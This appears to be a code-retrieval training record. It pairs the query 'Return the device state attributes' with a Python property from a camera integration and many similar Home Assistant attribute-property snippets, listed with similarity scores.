[ "0.87892145", "0.86683935", "0.86683935", "0.86683935", "0.83668846", "0.8228278", "0.80222344", "0.7944196", "0.7889458", "0.7790521", "0.7790521", "0.76525116", "0.7474403", "0.7448818", "0.74451506", "0.74371916", "0.73949003", "0.7393098", "0.7387312", "0.7380527", "0.736547", "0.73636496", "0.73410094", "0.7295203", "0.7290382", "0.7276533", "0.7271355", "0.7263637", "0.7256454", "0.7256454", "0.7256454", "0.7256454", "0.7256454", "0.72510976", "0.7225737", "0.72050744", "0.7162016", "0.713821", "0.71146786", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.71108186", "0.7107337", "0.710641", "0.7101826", "0.7092354", "0.7079597", "0.70716465", "0.70672154", "0.7059588", "0.7039396", "0.7039396", "0.7034777", "0.7030613", "0.7023489", "0.69935334", "0.69889545", "0.6985798", "0.6981768", "0.6979921", "0.696316", "0.6933011", "0.6913705", "0.69077885", "0.69042885", "0.6903379", "0.68983275", "0.6885932", "0.68503225", "0.6837218", "0.6824637", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.6823364", "0.68128216", "0.6796391", "0.67944694", "0.6785044", "0.6782405", "0.6782345", "0.678094", "0.67789614", "0.6776438" ]
0.0
-1
Icon to use in the frontend, if any.
def icon(self): return self._icon
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return ICON", "def icon(self):\n return None", "def icon(self):\n return None", "def icon(self):", "def icon(self):\n return DEFAULT_ICON", "def icon(self):\n return self.ICON", "def icon(self):\n return self.ICON", "def get_icon(self):\n raise NotImplementedError", "def get_icon(self):\r\n raise NotImplementedError", "def icon(self) -> str:\n return ICON_SERVER", "def icon(self):\n return ICON_BUS", "def get_icon(self):\n return self.ICON", "def get_icon(self):\n\t\treturn QIcon()", "def icon(self):\n if \"icon\" in self._typeconf:\n return self._typeconf[\"icon\"]", "def get_icon(self):\r\n return get_icon(self.ICON)", "def icon(self):\n return self.__icon", "def icon(self):\r\n try:\r\n return self.data['icon_url_base']+self.data['icon_url_name']\r\n except KeyError:\r\n return ''", "def icon(self):\n return \"mdi:hubspot\"", "def icon(self) -> str:\n return self._icon", "def icon(self) -> str:\n return self._icon", "def icon(self) -> str:\n return self._icon", "def icon(self):\r\n return self._icon", "def icon(self):\r\n icon_path = \":/plugins/pdok_services/icon.png\"\r\n icon = QtGui.QIcon(icon_path)\r\n return icon", "def icon(self) -> str | None:\n return self._icon", "def get_icon(self):\n return self._icon", "def getIcon(self):\n return \":/icons/Ship_Instance.svg\"", "def icon(self):\n return self._sensor[CONF_ICON]", "def icon(self):\n return self._config.get(CONF_ICON)", "def icon(self) -> str:\n return ICON_CORAL", "def icon(self) -> str:\n return ICON_CORAL", "def icon(self) -> typing.Union[str, None]:\n return self._icon", "def icon(self):\n return \"mdi:car\"", "def icon(self):\n if not self.device_class:\n return ICONS.get(self.entity_type)\n return None", "async def icon(self, ctx: lifesaver.Context):\n if not ctx.guild.icon:\n await ctx.send(\"This server doesn't have a custom icon.\")\n return\n\n await ctx.send(ctx.guild.icon.replace(format=\"png\"))", "def icon(self):\n if self.zone_variable == \"temperature\":\n return \"mdi:thermometer\"\n if self.zone_variable == \"humidity\":\n return \"mdi:water-percent\"", "def icon(self):\n return self.var_icon", "def icon(self) -> str | None:\n if isinstance(self.wemo, CoffeeMaker):\n return \"mdi:coffee\"\n return None", "def icon(self) -> Icon:\n return self._icon", "def icon(self):\n return self.sensor_type[\"icon\"]", "def get_icon(self):\n\n return self._icon", "def _icons(self):", "def icon(self):\n return self._sensor_type.icon", "def icon(self):\n return self._var_icon", "def icon(self):\n return self._var_icon", "def icon(self):\n return self._metadata[2]", "def get_icon_class(self):\r\n return self.icon_class", "def icon(self) -> str:\n return \"mdi:thermometer\"", "def icon(self):\n return 'mdi:broom'", "def get_icon(self):\n try:\n icon = self.icon.fa_icon\n except AttributeError:\n icon = 'fa-globe'\n\n return icon", "def getIconPath(self):\n try:\n return self.primaryAq().zIcon\n except AttributeError:\n return '/zport/dmd/img/icons/noicon.png'", "def icon(self) -> str | None:\n value = self.entity_description.icon\n if self.entity_description.key == \"weather\":\n value = self.state\n if value is None:\n value = \"sunny\"\n elif value == \"partlycloudy\":\n value = \"partly-cloudy\"\n value = f\"mdi:weather-{value}\"\n\n return value", "def icon(self):\n if self.device_class:\n return None\n\n return ICONS.get(self.tesla_device.type)", "def show_os_icon(self):\n if self.os == 0:\n return \"<i class='devicon-debian-plain'></i>\"\n elif self.os == 1:\n return \"<i class='devicon-redhat-plain'></i>\"\n else:\n return \"?\"", "def icon(self):\n return STATUSES.get(self._mower_status, {}).get('icon', DEFAULT_ICON)", "def getIconPath(self):\n return '/zport/dmd/img/icons/noicon.png'", "def icon(self, value: str | None) -> None:\n self._icon = value", "def icon(self):\n if self._sensor_type == DEVICE_TYPE_DOORBELL:\n if self._camera_data[\"event_ring_on\"]:\n return \"mdi:bell-ring-outline\"\n return \"mdi:doorbell-video\"", "def icon(self, icon):\n self._icon = icon", "def toolIcon(self):\n if self.tmFile is not None:\n iconFile = pFile.conformPath(os.path.join(os.path.dirname(self.tmFile), '__ico__.png'))\n if os.path.exists(iconFile):\n return iconFile", "def icon(self) -> str | None:\n return self._get_sensor_type()[1]", "def get_icon():\n icon = Path(__file__).parent.joinpath(\"resources\", \"icon.png\")\n # We just want the string to the path for PySide.\n return str(icon)", "def icon(self):\n ret_icon = self._icon\n if self.player_name == \"lower\":\n ret_icon = self._icon.lower()\n if self.is_promoted:\n ret_icon = \"+\" + ret_icon\n return ret_icon", "def getIcon():\n\treturn \"Animator.png\"", "def icon(self):\n return \"mdi:currency-gbp\"", "def icon(self):\n if self._sensor_type == \"battery_level\" and self._state is not None:\n return icon_for_battery_level(\n battery_level=int(self._state), charging=False\n )\n return self._icon", "def icon(self):\n icons = self._icons.split(\",\")\n return (\n f\"mdi:{icons[0]}\" if self.state != TYPE_RECORD_NEVER else f\"mdi:{icons[1]}\"\n )", "def icon(self):\n if self._type == 'birth':\n return 'mdi:calendar-star'\n elif self._type == 'wedding':\n return 'mdi:calendar-heart'\n elif self._type == 'memorial':\n return 'mdi:calendar-clock'\n else:\n return 'mdi:calendar-check'", "def icon(self):\n\n # look for icon one level up from this hook's folder in \"icons\" folder\n return os.path.join(\n self.disk_location,\n os.pardir,\n \"icons\",\n \"review.png\"\n )", "def icon_url(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"icon_url\")", "def get_icon_name(self):\n return 'gramps-notes'", "def om_icons(self):\n icons = ({'path': 'misc_/DataTemplates/ic-xml.gif',\n 'alt': self.meta_type, 'title': self.meta_type},)\n if not self._v_cooked:\n self._cook()\n if self._v_errors:\n icons = icons + ({'path': 'misc_/PageTemplates/exclamation.gif',\n 'alt': 'Error',\n 'title': 'This template has an error'},)\n return icons", "def icon(self):\n return SENSOR_TYPES[self.type][2]" ]
[ "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8216609", "0.8134013", "0.8134013", "0.80181646", "0.7946183", "0.79384285", "0.79384285", "0.79349846", "0.7925307", "0.7891739", "0.78858066", "0.7807477", "0.7763528", "0.772793", "0.7699367", "0.7653089", "0.7557824", "0.75493824", "0.750676", "0.750676", "0.750676", "0.7485068", "0.74771065", "0.74713224", "0.7458794", "0.7409361", "0.73843366", "0.7369637", "0.7343618", "0.7343618", "0.73394156", "0.7282764", "0.7277016", "0.72681504", "0.72499543", "0.7224799", "0.72145945", "0.7207319", "0.72068244", "0.7200781", "0.7190791", "0.71740735", "0.7163048", "0.7163048", "0.71617895", "0.7154149", "0.71123415", "0.70922625", "0.70890933", "0.7081491", "0.7074217", "0.7071028", "0.7051232", "0.7027755", "0.7025085", "0.7006342", "0.7004105", "0.69972306", "0.69961834", "0.6987644", "0.6985583", "0.6942356", "0.6940673", "0.69370043", "0.69283247", "0.6910015", "0.68887156", "0.68828356", "0.6874635", "0.6866664", "0.6848983", "0.6843187" ]
0.75128
40
Return the device state attributes.
def device_state_attributes(self): attrs = {} attrs[ATTR_ATTRIBUTION] = DEFAULT_ATTRIBUTION attrs[ATTR_BRAND] = DEFAULT_BRAND attrs[ATTR_CAMERA_TYPE] = self._camera_type return attrs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def device_state_attributes(self):\r\n return self.attributes", "def device_state_attributes(self):\r\n return self._attributes", "def device_state_attributes(self):\n return self._attrs", "def device_state_attributes(self):\n return self.attr", "def device_state_attributes(self):\n return self.attr", "def device_state_attributes(self):\n return self._state_attrs", "def device_state_attributes(self):\n return self._state_attrs", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n return self._state_attributes", "def device_state_attributes(self): # Can be remove from 0.99\n return self._attr", "def device_state_attributes(self) -> Dict[str, any]:\n return self._device.state_attributes", "def device_state_attributes(self):\n return self._attribute", "def device_state_attributes(self):\n return self._attribute", "def device_state_attributes(self):\n return self._ba_attrs", "def device_state_attributes(self):\n return self._device.status", "def device_state_attributes(self):\n return self.custom_attributes", "def device_state_attributes(self):\n attrs = {\n ATTR_ATTRIBUTION: ATTRIBUTION,\n ATTR_DEVICE_ID: self.unique_id,\n }\n return attrs", "def device_state_attributes(self):\n attributes = self._attrs\n\n for variable in self._sid_data[\"sid_attr\"]:\n if variable in self._data:\n attributes[format_attribute(variable)] = self._data[variable]\n\n return attributes", "def device_state_attributes(self):\n return {\n ATTR_ATTRIBUTION: ATTRIBUTION,\n \"state\": self._unlocked,\n \"available\": self.available,\n \"door_open\": self._door_open,\n \"device_model\": self._device.product_model,\n \"mac\": self.unique_id\n }", "def device_state_attributes(self):\n attrs = {}\n attrs[\"up_since\"] = self._up_since\n attrs[\"last_motion\"] = self._last_motion\n attrs[\"online\"] = self._online\n attrs[\"uuid\"] = self._uuid\n\n return attrs", "def device_state_attributes(self):\n return {\n 'addr': self._device.addr,\n 'ieee': self._device.ieee,\n 'endpoint': '0x{:02x}'.format(self._endpoint),\n }", "def device_state_attributes(self):\n return {ATTR_ATTRIBUTION: ATTRIBUTION}", "def device_state_attributes(self):\n return {ATTR_ATTRIBUTION: ATTRIBUTION}", "def device_state_attributes(self):\n return {\"uuid\": self.uuidAction,\n \"room\": self.room,\n \"category\": self.cat,\n \"device_typ\": self.type,\n \"plattform\": \"loxone\"}", "def device_state_attributes(self):\n res = {}\n res[ATTR_DEPARTURE] = self._departure\n res[ATTR_DURATION] = self._duration\n res[ATTR_DELAY] = self._delay\n res[ATTR_CONNECTIONS] = self._connections\n res[ATTR_DESCRIPTION] = self._description\n res[ATTR_START_TIME] = self._start_time\n res[ATTR_DETAIL] = self._detail\n return res", "def device_state_attributes(self):\n\n attr = {\n \"uiclass\": self.tahoma_device.uiclass,\n \"widget\": self.tahoma_device.widget,\n \"type\": self.tahoma_device.type,\n }\n\n if CORE_RSSI_LEVEL_STATE in self.tahoma_device.active_states:\n attr[ATTR_RSSI_LEVEL] = self.tahoma_device.active_states[\n CORE_RSSI_LEVEL_STATE\n ]\n\n # TODO Parse 'lowBattery' for low battery warning. 'dead' for not available.\n # \"dead\", \"lowBattery\", \"maintenanceRequired\", \"noDefect\"\n if CORE_SENSOR_DEFECT_STATE in self.tahoma_device.active_states:\n attr[ATTR_BATTERY_LEVEL] = self.tahoma_device.active_states[\n CORE_SENSOR_DEFECT_STATE\n ]\n\n return attr", "def device_state_attributes(self):\n return {\"uuid\": self.uuidAction, \"room\": self.room,\n \"category\": self.cat,\n \"device_typ\": self.type, \"plattform\": \"loxone\"}", "def device_state_attributes(self):\n attr = {}\n attr['remote_lock'] = self.remote_lock\n attr['power_state'] = self._power_state\n attr['heating_active'] = self._is_heating_active\n attr['auto_override'] = self.auto_override\n attr['sensor_mode'] = self.sensor_mode\n attr['external_sensor_temprange'] = self.external_temp\n attr['deadzone_sensor_temprange'] = self.deadzone_sensor_temprange\n attr['loop_mode'] = self._loop_mode\n attr['roomtemp_offset'] = self.roomtemp_offset\n attr['anti_freeze_function'] = self.anti_freeze_function\n attr['poweron_mem'] = self.poweron_mem\n attr['external_temp'] = self.external_temp\n attr['clock_hour'] = self.clock_hour\n attr['clock_min'] = self.clock_min\n attr['clock_sec'] = self.clock_sec\n attr['day_of_week'] = self.day_of_week\n attr['week_day'] = self.week_day\n attr['week_end'] = self.week_end\n return attr", "def device_state_attributes(self):\n tmp = self._boiler.__dict__.items()\n return {'status': {k: v for k, v in tmp if k in GH_STATE_ATTRS}}", "def device_state_attributes(self):\n attr = {}\n if self._last_updated is not None:\n attr['Last Updated'] = self._last_updated\n return attr", "def device_state_attributes(self):\n return {ATTR_NUMBER: self._index}", "def device_state_attributes(self):\n data = {}\n if self._is_dimmable and self._brightness_pct:\n data = {ATTR_BRIGHTNESS_PCT: self._brightness_pct}\n data.update({#'alarm': self._alarm,\n 'operation_mode': self.operation_mode,\n 'rssi': self._rssi,\n 'occupancy': self._occupancy,\n 'wattage_override': self._wattage_override,\n 'id': self._id})\n return data", "def device_state_attributes(self):\n # attributes = super().device_state_attributes\n _config_attrib = self._product.get_data_config_json()\n return _config_attrib", "def device_state_attributes(self):\n # attributes = super().device_state_attributes\n attributes = {ATTR_UNIT_OF_MEASUREMENT: self._unit}\n return attributes", "def device_state_attributes(self):\n return {\n ATTR_ATTRIBUTION: HA_ATTRIBUTION,\n HA_TIMESTAMP: self._timestamp,\n }", "def device_state_attributes(self):\n return {\n \"attribution\": ATTRIBUTION,\n \"id\": str(self.coordinator.data.get(\"id\")),\n \"integration\": DOMAIN,\n }", "def device_state_attributes(self):\n return {\n ATTR_ATTRIBUTION: ATTRIBUTION,\n ATTR_LAST_UPDATE: self.metoffice_now.date if self.metoffice_now else None,\n ATTR_SENSOR_ID: self._type,\n ATTR_SITE_ID: self.metoffice_site_id if self.metoffice_site_id else None,\n ATTR_SITE_NAME: self.metoffice_site_name\n if self.metoffice_site_name\n else None,\n }", "def device_state_attributes(self):\n return self._emeter_params", "def device_state_attributes(self) -> str:\n return {\n \"remo_device_id\": self._remo_device.id,\n \"remo_device_name\": self._remo_device.name,\n \"remo_firmware_version\": self._remo_device.firmware_version,\n \"remo_temperature_offset\": self._remo_device.temperature_offset,\n \"remo_humidity_offset\": self._remo_device.humidity_offset\n }", "def device_state_attributes(self):\n # Move these to Thermostat Device and make them global\n return {\n \"current_humidity\": self._current_humidity,\n \"status\": self._current_state,\n \"program\": self._current_program,\n \"away_mode\": self._away\n }", "def device_state_attributes(self):\n return {\n ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION,\n ATTR_CAMERA_TYPE: self._device_type,\n }", "def device_state_attributes(self):\n return self._hass.data[DATA_UPCOMING]", "def device_state_attributes(self):\n attr = {}\n\n if self._battery_level is not None:\n attr[ATTR_BATTERY_LEVEL] = self._battery_level\n\n return attr", "def device_state_attributes(self):\n attrs = {\n ATTR_STATE_DEVICE_LOCKED: self._device.device_lock,\n ATTR_STATE_LOCKED: self._device.lock,\n }\n return attrs", "def device_state_attributes(self):\n if self._data is not None:\n return {\n \"阳历\": self._data.yangli,\n \"阴历\": self._data.yinli,\n \"五行\": self._data.wuxing,\n \"冲煞\": self._data.chongsha,\n \"百忌\": self._data.baiji,\n \"吉神\": self._data.jishen,\n \"宜\": self._data.yi,\n \"凶神\": self._data.xiongshen,\n \"忌\": self._data.ji,\n }", "def device_state_attributes(self):\n attrs = {}\n\n attrs[ATTR_ATTRIBUTION] = ATTRIBUTION\n attrs[\"brand\"] = DEFAULT_BRAND\n attrs[ATTR_CAMERA_TYPE] = self._camera_type\n attrs[\"friendly_name\"] = self._name\n\n return attrs", "def device_state_attributes(self):\n if self.ticker is not None:\n return {\n ATTR_VOLUME_24H: self.ticker.values.get(\"volume\"),\n ATTR_ATTRIBUTION: ATTRIBUTION,\n ATTR_HIGH: self.ticker.values.get(\"high\"),\n ATTR_LOW: self.ticker.values.get(\"low\"),\n ATTR_VWAP: self.ticker.values.get(\"vwap\")\n }", "def device_state_attributes(self):\n ret = {\n ATTR_ENTITY_ID: self._entity_id,\n ATTR_COEFFICIENTS: self._coefficients,\n CONF_TRACKED_ENTITY_ID: self._tracked_entity_id,\n ATTR_BASE_SENSOR: self._entity_id.replace(\"_calibrated\", \"\"),\n CONF_MQTT_TOPIC: self._mqtt_topic,\n CONF_DATAPOINTS: self._datapoints,\n }\n if self._attribute:\n ret[ATTR_ATTRIBUTE] = self._attribute\n if self._attributes:\n ret.update(self._attributes)\n return ret", "def device_state_attributes(self):\n node = self.gateway.sensors[self.node_id]\n child = node.children[self.child_id]\n attr = {\n ATTR_BATTERY_LEVEL: node.battery_level,\n ATTR_HEARTBEAT: node.heartbeat,\n ATTR_CHILD_ID: self.child_id,\n ATTR_DESCRIPTION: child.description,\n ATTR_DEVICE: self.gateway.device,\n ATTR_NODE_ID: self.node_id,\n }\n\n set_req = self.gateway.const.SetReq\n\n for value_type, value in self._values.items():\n attr[set_req(value_type).name] = value\n\n return attr", "def device_state_attributes(self):\n return {\n ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION,\n ATTR_CAMERA_TYPE: self._camera_type,\n }", "def device_state_attributes(self):\n return {\"uuid\": self.uuidAction, \"room\": self.room,\n \"category\": self.cat,\n \"selected_scene\": self.effect,\n \"device_typ\": self.type, \"plattform\": \"loxone\"}", "def device_state_attributes(self):\n if self._type == ATTR_CAQI:\n self._attrs[ATTR_CAQI_LEVEL] = self.data[ATTR_CAQI_LEVEL]\n if self._type == ATTR_PM25:\n self._attrs[ATTR_LIMIT] = self.data[ATTR_PM25_LIMIT]\n self._attrs[ATTR_PERCENT] = round(self.data[ATTR_PM25_PERCENT])\n if self._type == ATTR_PM10:\n self._attrs[ATTR_LIMIT] = self.data[ATTR_PM10_LIMIT]\n self._attrs[ATTR_PERCENT] = round(self.data[ATTR_PM10_PERCENT])\n return self._attrs", "def device_state_attributes(self):\n attr = {\n 'folder': self._folder_path,\n 'filter': self._filter_term,\n 'recursive': self._recursive,\n 'number_of_files': self._number_of_files,\n 'bytes': self._size,\n 'last_added': self._last_added,\n 'last_deleted': self._last_deleted,\n 'last_modified': self._last_modified\n }\n return attr", "def device_state_attributes(self):\n if self._xfinity_data.total_usage is None:\n return None\n\n res = {ATTR_ATTRIBUTION: ATTRIBUTION}\n res[ATTR_TOTAL_USAGE] = self._xfinity_data.total_usage\n res[ATTR_ALLOWED_USAGE] = self._xfinity_data.allowed_usage\n res[ATTR_REMAINING_USAGE] = self._xfinity_data.remaining_usage\n return res", "def device_state_attributes(self):\n return{\n ATTR_STREET_NUMBER: self._street_number,\n ATTR_STREET: self._street,\n ATTR_CITY: self._city,\n ATTR_POSTAL_TOWN: self._postal_town,\n ATTR_POSTAL_CODE: self._postal_code,\n ATTR_REGION: self._region,\n ATTR_COUNTRY: self._country,\n ATTR_COUNTY: self._county,\n ATTR_ATTRIBUTION: CONF_ATTRIBUTION,\n ATTR_FORMATTED_ADDRESS: self._formatted_address,\n }", "def device_state_attributes(self):\n attr = {\n CONF_TARGETS: self._targets,\n PREDICTIONS: self._predictions\n }\n\n return attr", "def state_attributes(self):\n return self._attributes", "def state_attributes(self):\n return self._attributes", "def device_state_attributes(self):\n\n state = {\n \"car\": self._licenseplate,\n \"vin\": self._vin,\n \"retrievalstatus\": self._get_car_value(\n self._feature_name,\n self._object_name,\n \"retrievalstatus\",\n \"error\"\n ),\n }\n if self._extended_attributes is not None:\n for attrib in self._extended_attributes:\n\n retrievalstatus = self._get_car_value(self._feature_name, attrib,\n \"retrievalstatus\", \"error\")\n\n if retrievalstatus == \"VALID\":\n state[attrib] = self._get_car_value(\n self._feature_name, attrib, \"value\", \"error\"\n )\n\n if retrievalstatus == \"NOT_RECEIVED\":\n state[attrib] = \"NOT_RECEIVED\"\n return state", "def device_state_attributes(self):\n attributes = dict(self._state)\n\n # Parse timestamps\n for key in ['lastErrorCodeTimestamp', 'nextStartTimestamp', 'storedTimestamp']:\n if key in attributes:\n if isinstance(attributes[key], int):\n # Sometimes(tm), Husqvarna will return a timestamp in millis :(\n if attributes[key] > 999999999999:\n attributes[key] /= 1000.0\n attributes[key] = datetime.utcfromtimestamp(attributes[key])\n\n # Ignore some unneeded attributes & format error messages\n ignored_attributes = list(IGNORED_API_STATE_ATTRIBUTES)\n if attributes['lastErrorCode'] > 0:\n attributes['lastErrorMessage'] = ERROR_MESSAGES.get(attributes['lastErrorCode'])\n else:\n ignored_attributes.extend(['lastErrorCode', 'lastErrorCodeTimestamp', 'lastErrorMessage'])\n if attributes['nextStartSource'] == 'NO_SOURCE':\n ignored_attributes.append('nextStartTimestamp')\n\n return sorted({ k: v for k, v in attributes.items() if not k in ignored_attributes }.items())", "def state_attributes(self):\n return {\"uuid\": self.uuidAction, \"room\": self.room,\n \"category\": self.cat,\n \"device_typ\": self.type, \"plattform\": \"loxone\"}", "def device_state_attributes(self):\n return {\n ATTR_BATTERY_LEVEL:\n self.device.device_data[self.device_id]['battery_level']\n }", "def device_state_attributes(self):\n if self.airly.data_available:\n if self.type == ATTR_CAQI_DESCRIPTION:\n self._attrs[ATTR_CAQI_ADVICE] = (self.airly.data\n [ATTR_CAQI_ADVICE])\n if self.type == ATTR_CAQI:\n self._attrs[ATTR_CAQI_LEVEL] = self.airly.data[ATTR_CAQI_LEVEL]\n if self.type == ATTR_PM25:\n self._attrs[ATTR_LIMIT] = self.airly.data[ATTR_PM25_LIMIT]\n self._attrs[ATTR_PERCENT] = (round(self.airly.data\n [ATTR_PM25_PERCENT]))\n if self.type == ATTR_PM10:\n self._attrs[ATTR_LIMIT] = self.airly.data[ATTR_PM10_LIMIT]\n self._attrs[ATTR_PERCENT] = (round(self.airly.data\n [ATTR_PM10_PERCENT]))\n return self._attrs", "def extra_state_attributes(self) -> dict[str, bool | int]:\n attr = {}\n\n if self._device.offset is not None:\n attr[ATTR_OFFSET] = self._device.offset\n\n if self._device.valve is not None:\n attr[ATTR_VALVE] = self._device.valve\n\n if self._device.locked is not None:\n attr[ATTR_LOCKED] = self._device.locked\n\n return attr", "def device_state_attributes(self):\n while len(self._device.prices) < 4:\n self._device.prices.append(\"None\")\n attrs = {\n \"device_name\": self._device.name,\n \"description\": self.description,\n \"unit_of_measurement\": self._device.price_currency,\n \"product_id\": self.product_id,\n \"price1\": self._device.prices[0],\n \"price2\": self._device.prices[1],\n \"price3\": self._device.prices[2],\n \"price4\": self._device.prices[3],\n }\n return attrs", "def state_attributes(self):\n return self._vehicle.data", "def device_state_attributes(self):\n attr = {}\n attr[\"enabled\"] = self._controller.enabled\n attr[\"zone_count\"] = len(self._controller._zones)\n attr[\"zones\"] = \"\"\n current = self._controller.runs.current_run\n if current is not None:\n attr[\"current_zone\"] = current.index + 1\n attr[\"current_name\"] = current.zone.name\n attr[\"current_start\"] = dt.as_local(current.start_time)\n attr[\"current_duration\"] = str(current.duration)\n attr[\"time_remaining\"] = str(current.time_remaining)\n attr[\"percent_complete\"] = current.percent_complete\n else:\n attr[\"current_schedule\"] = RES_NOT_RUNNING\n attr[\"percent_complete\"] = 0\n\n next = self._controller.runs.next_run\n if next is not None:\n attr[\"next_zone\"] = next.index + 1\n attr[\"next_name\"] = next.zone.name\n attr[\"next_start\"] = dt.as_local(next.start_time)\n attr[\"next_duration\"] = str(next.duration)\n else:\n attr[\"next_schedule\"] = RES_NONE\n\n return attr", "def device_state_attributes(self):\n # TODO: convert RH from Elk to AH ?\n #if self.current_humidity > 0:\n # humidity = self.current_humidity\n data = {\n 'hidden': self._hidden,\n 'temp_unit' : self.temperature_unit,\n }\n if self._device.temp_outside is not None and self._device.temp_outside > -460:\n data['temp_outside'] = self._device.temp_outside\n if self._device.temp_3 is not None and self._device.temp_3 > -460:\n data['temp_3'] = self._device.temp_3\n if self._device.temp_4 is not None and self._device.temp_4 > -460:\n data['temp_4'] = self._device.temp_4\n return data", "def device_state_attributes(self):\n return {\n \"load_shedding_active\": self.coordinator.data.get(\"load_shedding_active\"),\n }", "def state_attributes(self):\n return self._wan", "def extra_state_attributes(self):\n\n attrs = {\n \"device_id\": self._device_id,\n \"is_smart_program\": self._program.get(\"is_smart_program\", False),\n \"frequency\": self._program.get(\"frequency\"),\n \"start_times\": self._program.get(\"start_times\"),\n \"budget\": self._program.get(\"budget\"),\n \"program\": self._program.get(\"program\"),\n \"run_times\": self._program.get(\"run_times\"),\n }\n\n return attrs", "def state_attributes(self):\n\n data = {\n \"devices\": {\n \"AC1\": {\n \"participate\": True,\n \"reset\": False,\n \"zone_min\": 0,\n \"zone_max\": 1,\n \"flexibility\": \"high\"\n },\n \"AC2\": {\n \"participate\": True,\n \"reset\": False,\n \"zone_min\": 0,\n \"zone_max\": 1,\n \"flexibility\": \"low\"\n },\n \"WH1\": {\n \"participate\": True,\n \"reset\": False,\n \"zone_min\": 0,\n \"zone_max\": 1,\n \"flexibility\": \"low\"\n }\n }\n }\n\n return data", "def state_attributes(self):\n attrs = {\"access_token\": self.access_tokens[-1]}\n\n if self.model:\n attrs[\"model_name\"] = self.model\n\n if self.brand:\n attrs[\"brand\"] = self.brand\n\n if self.motion_detection_enabled:\n attrs[\"motion_detection\"] = self.motion_detection_enabled\n\n if self.supports_doorbell_chime:\n attrs[\"doorbell_chime\"] = self.supports_doorbell_chime\n\n return attrs", "def extra_state_attributes(self):\n attr = {}\n #attr[\"name\"] = self._visonic_device.getDeviceName()\n attr[PANEL_ATTRIBUTE_NAME] = self._panel\n attr[DEVICE_ATTRIBUTE_NAME] = self._visonic_device.getDeviceID()\n return attr", "def device_state_attributes(self):\n attributes = {\n ATTR_DEVICE_TYPE: self._device_type,\n ATTR_ATTRIBUTION: ATTRIBUTION\n }\n\n if not self._coordinator.data:\n return attributes\n\n # reformat date/time\n try:\n str_start = self._coordinator.data['start']\n str_end = self._coordinator.data['end']\n dt_start = datetime.strptime(str_start, INPUT_DATETIME_FORMAT)\n dt_end = datetime.strptime(str_end, INPUT_DATETIME_FORMAT)\n attributes[ATTR_START_DATETIME] = datetime.strftime(dt_start, ATTR_DATETIME_FORMAT)\n attributes[ATTR_END_DATETIME] = datetime.strftime(dt_end, ATTR_DATETIME_FORMAT)\n except:\n _LOGGER.warning(\"Failed to reformat datetime object\")\n\n return attributes", "def state_attributes(self):\n return {\n ATTR_WEATHER_ATTRIBUTION: ATTRIBUTION,\n ATTR_STATION: self.probe.get_data('station_name'),\n ATTR_UPDATED: '{} {}'.format(self.probe.get_data('update_date'),\n self.probe.get_data('update_time')),\n }", "def device_state_attributes(self):\n if self._sensor_type == DEVICE_TYPE_DOORBELL:\n return {\n ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION,\n ATTR_LAST_TRIP_TIME: self._camera_data[\"last_ring\"],\n }\n if (\n self._camera_data[\"event_object\"] is not None\n and len(self._camera_data[\"event_object\"]) > 0\n ):\n detected_object = self._camera_data[\"event_object\"][0]\n _LOGGER.debug(\n f\"OBJECTS: {self._camera_data['event_object']} on {self._name}\"\n )\n else:\n detected_object = \"None Identified\"\n return {\n ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION,\n ATTR_LAST_TRIP_TIME: self._camera_data[\"last_motion\"],\n ATTR_EVENT_SCORE: self._camera_data[\"event_score\"],\n ATTR_EVENT_LENGTH: self._camera_data[\"event_length\"],\n ATTR_EVENT_OBJECT: detected_object,\n }", "def device_state_attributes(self) -> dict:\n return {\n \"auto_comfort\": self._device.fan_autocomfort.capitalize(),\n \"smartmode\": self._device.fan_smartmode.capitalize(),\n **super().device_state_attributes,\n }", "def device_state_attributes(self):\n return {\n \"next_load_shedding_slot\": self.coordinator.data.get(\"next_load_shedding_slot\"),\n }", "def device_state_attributes(self):\n attrs = {}\n\n for poc in self._pockets:\n id = poc[CONF_POCKET_ID]\n name = poc[CONF_POCKET_NAME]\n\n attrs[id] = name\n\n return attrs", "def state_information(self) -> Dict[str, Any]:\n raise NotImplementedError(\"Device subclass needs to implement this.\")", "def device_state_attributes(self):\n attr = {}\n attr[\"enabled\"] = self._zone.enabled and self._controller.enabled\n attr[\"status\"] = self._zone.status\n attr[\"schedule_count\"] = len(self._zone.schedules)\n attr[\"schedules\"] = \"\"\n attr[\"adjustment\"] = self._zone.adjustment.as_string\n current = self._zone.runs.current_run\n if current is not None:\n if current.schedule is not None:\n attr[\"current_schedule\"] = current.schedule.schedule_index + 1\n attr[\"current_name\"] = current.schedule.name\n else:\n attr[\"current_schedule\"] = RES_MANUAL\n attr[\"current_name\"] = RES_MANUAL\n attr[\"current_start\"] = dt.as_local(current.start_time)\n attr[\"current_duration\"] = str(current.duration)\n attr[\"time_remaining\"] = str(current.time_remaining)\n attr[\"percent_complete\"] = current.percent_complete\n else:\n attr[\"current_schedule\"] = RES_NOT_RUNNING\n 